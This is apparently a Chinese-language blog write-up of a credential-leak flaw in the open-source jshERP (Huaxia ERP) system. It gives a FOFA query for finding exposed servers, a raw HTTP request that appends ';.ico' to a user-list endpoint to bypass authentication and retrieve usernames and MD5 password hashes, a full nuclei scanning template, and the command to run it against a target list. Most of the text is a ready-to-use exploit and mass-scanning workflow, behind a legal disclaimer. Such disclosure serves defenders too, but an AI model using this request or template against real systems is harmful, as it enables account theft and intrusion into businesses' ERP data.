免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!

漏洞名称

jshERP敏感信息泄露漏洞

漏洞影响

开源ERP系统jshERP所有版本

官网
https://www.huaxiaerp.com/
github
https://github.com/jishenghua/jshERP

系统首页如下

漏洞描述

华夏ERP基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,可以获取到系统的账号密码。

FOFA搜索语句

body="jshERP-boot"

漏洞复现

poc如下


GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

证明存在漏洞

其中loginName为用户名,password是MD5加密

nuclei poc

poc文件内容如下


id: jsh-erp-userpassword-leak

info:
  name: 华夏ERP账号密码泄露
  author: fgz
  severity: high
  description: '华夏ERP基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。该系统存在信息泄露漏洞,攻击者可以通过特定ULR获取系统账号密码。'
  tags: 2023,leak,jshERP
  metadata:
    max-request: 3
    fofa-query: body="jshERP-boot"
    verified: true

http:
  - method: GET
    path:
      - "{{BaseURL}}/jshERP-boot/user/getAllList;.ico"
    matchers:
      - type: word
        words:
          - "username"
          - "password"
          - "loginName"
        condition: and

运行POC

.\nuclei.exe -t mypoc/华夏erp/jsh-erp-userinfo-leak.yaml -l data/jsherp.txt -me result